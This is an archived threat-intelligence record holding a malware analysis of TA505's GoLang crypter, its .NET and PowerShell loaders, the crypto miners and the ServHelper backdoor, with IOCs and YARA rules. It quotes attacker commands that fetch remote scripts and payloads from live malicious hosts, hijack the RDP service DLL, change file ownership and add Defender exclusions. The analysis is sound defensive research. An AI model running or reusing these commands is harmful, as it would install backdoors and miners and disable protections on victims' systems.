{
	"id": "401da398-505a-43fc-bf71-bea21d08d76d",
	"created_at": "2026-04-06T00:14:03.23717Z",
	"updated_at": "2026-04-10T03:36:37.028707Z",
	"deleted_at": null,
	"sha1_hash": "b07a7b16aba2cd0c504064f5de5b3be4916fbb76",
	"title": "TA505 adds GoLang crypter for delivering miners and ServHelper",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1262520,
	"plain_text": "TA505 adds GoLang crypter for delivering miners and ServHelper\r\nBy Jason Reaves\r\nPublished: 2021-07-06 · Archived: 2026-04-05 21:59:44 UTC\r\nJul 6, 2021\r\nBy: Jason Reaves and Joshua Platt\r\nRecently we discovered a campaign that has been detailed by a number of other groups[1,2,4] and that is being leveraged in recent campaigns for delivering malware associated with TA505, namely ServHelper[3]. In an article by Avira[4] they linked older campaigns utilizing NSIS loaders, but more recently the campaigns have evolved to also leverage GoLang crypters wrapped around .NET loaders to start the chain.\r\nCrypter\r\nThe crypter layer is written in GoLang and is designed to obfuscate the next layer; the encoded data appears to be BASE64 but contains characters that are not part of the BASE64 alphabet.\r\nhttps://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\nPage 1 of 10\n\nSome of the other function parameters would lead me to believe it is replacing characters in the string.\r\nWe can do a quick check by seeing if ‘A’ exists in the string at all:\r\nAnother file with the same crypter replaces two bytes instead of one:\r\nAfter decoding this layer we are left with a .NET executable that is named ‘Dropper 1.0.0’ and has some interesting resources.\r\nExecution starts in the program's Main component:\r\nWhich then runs ‘Form1’:\r\nWithin the ‘InitializeComponent’ function we can see ‘Form1_Load’ being set as the EventHandler, which is actually responsible for detonating the PowerShell script resources.\r\n
The script ‘ready.ps1’ sets up a class for a few functions and detonates the ‘get-content.ps1’ script, which handles installing and setting up a number of executable files along with a backdoor and persistence. It can also pull in other files for detonating:\r\n$g=New-Object -ComObject Msxml2.XMLHTTP;$g.open('GET',\"hxxp://88[.]119.171.253/dropper.ps1\",$false);$\r\nThis dropper PowerShell script contains many layers of obfuscation but eventually leads to a script that will install multiple miner bots for Bitcoin and Eth.\r\n$payloadurl=\"http://beautyiconltd.cn/ethged.txt\"\r\n$configurl=\"http://beautyiconltd.cn/ethcnf.txt\"\r\n$hash=(New-Object Net.Webclient).downloadstring(\"http://beautyiconltd.cn/ethhsh.txt\")\r\nPowerShell Loader\r\nThe previous Get-Content PowerShell file is very similar in structure to the one listed in this blog post[1]. The PowerShell file writes multiple files to disk related to an RDP service, including a registry blob for setting up the service:\r\nWindows Registry Editor Version 5.00\r\n[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]\r\n\"DependOnService\"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00\r\n\"Description\"=\"@%SystemRoot%\\\\System32\\\\termsrv.dll,-267\"\r\n\"DisplayName\"=\"@%SystemRoot%\\\\System32\\\\termsrv.dll,-268\"\r\n\"ErrorControl\"=dword:00000001\r\n\"FailureActions\"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\\\r\n 00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00\r\n\"ImagePath\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\\\r\n 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\\\r\n 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\\\r\n 6b,00,20,00,4e,00,65,00,74,00,77,00,6f,00,72,00,6b,00,53,00,65,00,72,00,76,\\\r\n 00,69,00,63,00,65,00,00,00\r\n\"ObjectName\"=\"NT Authority\\\\NetworkService\"\r\n\"RequiredPrivileges\"=hex(7):53,00,65,00,41,00,73,00,73,00,69,00,67,00,6e,00,50,\\\r\n 00,72,00,69,00,6d,00,61,00,72,00,79,00,54,00,6f,00,6b,00,65,00,6e,00,50,00,\\\r\n 72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,41,00,75,\\\r\n 00,64,00,69,00,74,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,\\\r\n 00,00,53,00,65,00,43,00,68,00,61,00,6e,00,67,00,65,00,4e,00,6f,00,74,00,69,\\\r\n 00,66,00,79,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,\\\r\n 53,00,65,00,43,00,72,00,65,00,61,00,74,00,65,00,47,00,6c,00,6f,00,62,00,61,\\\r\n 00,6c,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,\\\r\n 65,00,49,00,6d,00,70,00,65,00,72,00,73,00,6f,00,6e,00,61,00,74,00,65,00,50,\\\r\n 00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,49,00,\\\r\n 6e,00,63,00,72,00,65,00,61,00,73,00,65,00,51,00,75,00,6f,00,74,00,61,00,50,\\\r\n 00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,00,00\r\n\"ServiceSidType\"=dword:00000001\r\n\"Start\"=dword:00000003\r\n\"Type\"=dword:00000020\r\n[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters]\r\n\"ServiceDll\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\\\r\n 00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\\\r\n 74,00,65,00,72,00,6d,00,73,00,72,00,76,00,2e,00,64,00,6c,00,6c,00,00,00\r\n\"ServiceDllUnloadOnStop\"=dword:00000001\r\n[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermServ\r\n\"Close\"=\"CloseTSObject\"\r\n\"Collect\"=\"CollectTSObjectData\"\r\n\"Collect Timeout\"=dword:000003e8\r\n\"Library\"=\"C:\\\\Windows\\\\System32\\\\perfts.dll\"\r\n\"Open\"=\"OpenTSObject\"\r\n\"Open Timeout\"=dword:000003e8\r\n\"InstallType\"=dword:00000001\r\n\"PerfIniFile\"=\"tslabels.ini\"\r\n\"First Counter\"=dword:0000238c\r\n\"Last Counter\"=dword:0000238c\r\n\"First Help\"=dword:0000238d\r\n\"Last Help\"=dword:0000238d\r\n\"Object List\"=\"9100\"\r\nThe listed ServiceDll for this registry blob is:\r\n%SystemRoot%\\\\System32\\\\termsrv.dll\\x00\r\nHowever, after installing this new service it is stopped, so this appears to be designed simply to set up a placeholder service:\r\nNew-Service -Name \"termservice\" -BinaryPathName \"C:\\WINDOWS\\System32\\svc\r\nreg import $env:temp\\rpds.reg\r\n}\r\nwrite-host kill\r\nset-service TermService -StartupType Disabled\r\n$tspid=(get-wmiobject win32_service | where { $_.name -eq 'TermService'}).processID\r\nStop-Process -Id $tspid -Force\r\n
Most of the files written to disk are files needed by RDPWrap, but there are two files that do not appear to be related to RDPWrap and are also UPX packed. These files are written to disk under hardcoded names:\r\n$fldr=$env:systemroot+\"\\branding\\\"\r\n$bf=\"mediasvc.png\"\r\n$rf=\"mediasrv.png\"\r\n$cf=\"wupsvc.jpg\"\r\nOne of these files will be set as the new ServiceDLL value for the previously mentioned placeholder service:\r\nreg add \"HKLM\\system\\currentcontrolset\\services\\TermService\\parameters\" /v ServiceDLL /t REG_EXPAND_S\r\nPayloads\r\nThis file calls itself ‘Helper’ and it contains encoded strings:\r\nCreating a quick string decoder lets us dump the strings and see that this file is designed to access the other two files, one being a DLL and the other the RDPWrap config, while also gathering some information about the system it is on.\r\nSLIn\r\nwupsvc.jpg\r\nwupsvc.jpg\r\ntermsrv.dll\r\nServiceMain\r\ntermsrv.dll\r\nMain\r\nslc.dll\r\nMain\r\nslc.dll\r\n%d.%d.%d.%d\r\nNew_Win8SLE\r\nNew_Win8SLE\r\nSLInitHook.x64A\r\nSLInitFunc.x64A\r\nasfjiau4hghas\r\nows\\branding\r\n\\mediasvc.png\r\n _\r\nvsdlskdngsj\r\nvsdlskdngsj\r\nSLGetWindowsInformationDWORD\r\nThe other DLL that was written to disk, which was also UPX packed, turns out to be the most interesting for us: this is the Tunnel variant of ServHelper[3] that was detailed in a blog post by BinaryDefense[2]. The blog post is pretty comprehensive and lined up well with what we saw in our samples. ServHelper related config data:\r\n{'C2': ['asdjausg.cn', 'potuybze.xyz', 'asfuuvhv3083f.xyz', 'http://bromide.xyz/ssh.zip', 'http://sds\r\nConclusion\r\nAn interesting full circle: a GoLang crypted .NET loader found dropping miner bots is also being used for delivering ServHelper.\r\nIOCs\r\nGoLang Crypted files:\r\nb591e73c3ebfe7ba44eb161c3cc1ee7b9a794d4e9b9b9aa4e3936f518e814ceb\r\n6eca26fcfabbb12c6a37eb689de222e75b31574dd25e7fd3d8b446d700c40133\r\nServHelper configs:\r\n{'C2': ['hopeithelps.xyz', 'adsgjuhsdgubhu4.xyz', 'zbuurhbbc.cn', 'http://bromide.xyz/ssh.zip', 'http\r\nPowerShell loader secondaries:\r\nhttp://45.61.136.223/get/arch.php\r\nhttp://45.61.136.223/get/getter.php\r\nhttp://45.61.136.223/get/grep.php\r\nhttp://45.61.136.223/get/m5.php\r\nhttp://88.119.171.253/dropper.ps1\r\nEndpoint indicators:\r\nschtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null\r\nreg add \"HKLM\\system\\cur\r\nicacls.exe rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"\r\nicacls.exe rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"\r\nicacls.exe rfxvmt.dll /remove \"NT AUTHORI\r\nicacls.exe rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"\r\n#\r\nicacls.exe rfxvmt.dll /remove \"BUILTIN\\Administrators\"\r\nicacls.exe rfxvmt.dll /grant \"BUILTIN\\Administrators:RX\"\r\nwrite-host inst\r\n$Job = Start-Job -ScriptBlock {Add-MpPreference -ExclusionPath \"C:\\windows\\branding\\*\"}\r\n$Job | Wait-Job -Timeout 15\r\n$Job | Stop-Job\r\n$Job =Start-Job -ScriptBlock {Add-MpPreference -ExclusionPath \"C:\\users\\wgautilacc\\desktop\\*\" -force}\r\n$Job | Wait-Job -Timeout 15\r\n$Job | Stop-Job\r\n$Job =Start-Job -ScriptBlock {Add-MpPreference -ExclusionPath \"C:\\users\\mirrors\\desktop\\*\"}\r\n$Job | Wait-Job -Timeout 15\r\n$Job | Stop-Job\r\n#Add-MpPreference -ExclusionPath \"C:\\windows\\branding\\*\"\r\n#Add-MpPreference -ExclusionPath \"C:\\users\\wgautilacc\\desktop\\*\" -force\r\n#Add-MpPreference -ExclusionPath \"C:\\users\\mirrors\\desktop\\*\"\r\n
YARA:\r\nrule unpacked_servhelper\r\n{\r\n    meta:\r\n        author = \"Jason Reaves\"\r\n    strings:\r\n        $string_1 = {48 8d 15 ?? ?? 00 00 4c 8d 05 ?? ?? 00 00 41 b9 ?? ?? ?? 00 e8}\r\n        $val = \"SELECT Name FROM Win32_Group where SID=\" wide\r\n    condition:\r\n        uint16(0) == 0x5A4D and all of them\r\n}\r\nrule unpacked_helper\r\n{\r\n    meta:\r\n        author = \"Jason Reaves\"\r\n        sample1 = \"620c009cd021b02d789a8a084e03a17a95b1606950d1db9dcbced29dadc0e1dc\"\r\n        sample2 = \"0b53130e094f715b729af44cdfbcd7c81ed37d71528c31e2a03fd2d5c3adfe0e\"\r\n    strings:\r\n        $a1 = \"Copyright (C) Helper 20\" wide\r\n        $s_decode = {8b c2 48 8d 4c 24 ?? 48 03 c8 8d 42 ?? 30 01 ff c2 8b 44 24 ?? 3b d0 72 e7}\r\n    condition:\r\n        all of them\r\n}\r\nReferences\r\n1: https://suid.ch/research/Telegram_Malware_Analysis.html\r\n2: https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/\r\n3: https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\n4: https://www.avira.com/en/blog/ta505-apt-group-targets-americas\r\nSource: https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56"
	],
	"report_names": [
		"ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434443,
	"ts_updated_at": 1775792197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b07a7b16aba2cd0c504064f5de5b3be4916fbb76.pdf",
		"text": "https://archive.orkl.eu/b07a7b16aba2cd0c504064f5de5b3be4916fbb76.txt",
		"img": "https://archive.orkl.eu/b07a7b16aba2cd0c504064f5de5b3be4916fbb76.jpg"
	}
}